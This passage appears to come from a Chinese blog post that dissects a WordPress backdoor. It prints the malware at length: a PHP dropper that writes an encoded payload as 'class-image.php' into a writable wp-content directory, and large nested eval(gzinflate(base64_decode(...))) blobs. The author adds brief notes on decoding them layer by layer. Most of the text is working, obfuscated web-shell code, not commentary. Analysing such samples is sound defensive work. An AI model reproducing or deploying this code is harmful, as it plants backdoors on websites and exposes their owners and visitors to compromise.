AVVOUcMptmQZe5PSpnOwX23c3P8pT2qS+5jJMxKYJXRK45CUVoFthwFDR8Yivv26dcrK/wWKfErOqzfZd8PpJRth7BWHezcsDB3sZHBKNf/wmtgLty/HIVoOx2agDJ9WqOZvTclT/HYh4PVekrMMULDwWqD/aOm2b6AZlQ27FftyI1GJ1KYb41N98S3/MDb9tFQOmtd81L5td39r8QqiZIF8T4Hsl2Wea44NQZbCpDSySY5zjSNogstBy9+9nHPY6IhTucl9tGnTqPlSAzweKVFmiugyxgb3r6wVIVErgn4deqSVcB6P0Qn6sV1DrXJNjOvl57OkpJx4Fckl6kmmeu0cxj39/AWf3vwpUPwJXFcexKPD1k7kX29e5dewrf2mogB7ERVBNUs3oSERFgoPWOD39ArQJwIdNQd0Rp9PvybI4ZeAAP78SX/6lzSVYTXu+g4k81iH0+Tmqg7VfE9eM7x0X/434bWasgd2Xf7YMCnfo7D0n5hCv29veEM+GOQ18XiC8d1iFeHki6UwQiR8zDFY+/3x8FaUL2d2gcf786zESyrx11EHv+pnKP4tjBUjDxmq+orstFhaDJj9nqtwnc3LzIQ748fC9L2BKaCpUETydMBBotg8AaNJY3uj1IpI/6u2YOxsrdw/mvBc2O2RpLBJHISMArcjCYz3CaXLBMq/GfCUL6LamuXLfALuqBBooLnPn6EHaCAMzgIJaiKdiwwEuq8Q176sv+oJxmQ6P8CtbGJFkRRQpPvwvUKwHmmUjJf9VYMuy8Jh7NFH4/N8CFYSSUJA9HvlTAK4xtLc9zZbeuYdc0nDx8tYbjuPfFSxMH+Qlgvs7G/Ymu/I2iwNeWIm1maoHzH+EYvpPcvxskxO3e74Nm6N067VorLOsinOMpq52TCsPW2q7+fJFcdturkDoXuQaEMfj5vIpPvvoEb0mZ6mQ4lX1saApV1ni78VVeVPI7DtrbFHclua7AZYnbkNfBsxanrI4KmbykAe+xIUS42j8/FYVqvazUDaDcrYiLadbmWcVOBs8NNO1qSOWnHz0RUrQ8Me+a9XArokuCuXmrqa3/Yd11SY+ggx49UQv2acUIvXkCJF7mrT3jzYb3h6NvlMExqDmnWggYEqJAw4EXOo6dwBcZB4xV8dLOrjC5AGbdj15WnXU1zeKtYWlhtxGeVTEKyspO5bXWtBPw1ddmtl+8sasdD988ufItTlcc0XcniDDZcXf54wH6yoKbj64Gja4F+vsAZTSR+wf6Jnv/NsWVCU65v7XCMk68gCMIAjT5voDUf//5999///N/');
?>');$dir = ABSPATH. 'wp-content';$wdir = end(get_leaf_dirs($dir));$f = fopen($wdir . "/class-image.php", "w+");fwrite($f, $str);fclose($f);echo "<!--##".$wdir . "/class-image.php##-->";function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}}$d->close();return $array;}?>
先把开头弄出来,看看是什么玩意。。。
create_function中的匿名函数代码组合出来是 eval(gzinflate(base64_decode($v))); 居心叵测啊。。。
去掉前面的eval,解码解压后看看是什么玩意。。。
经过博主多次手动解码解压后还是一段
eval(gzinflate(base64_decode('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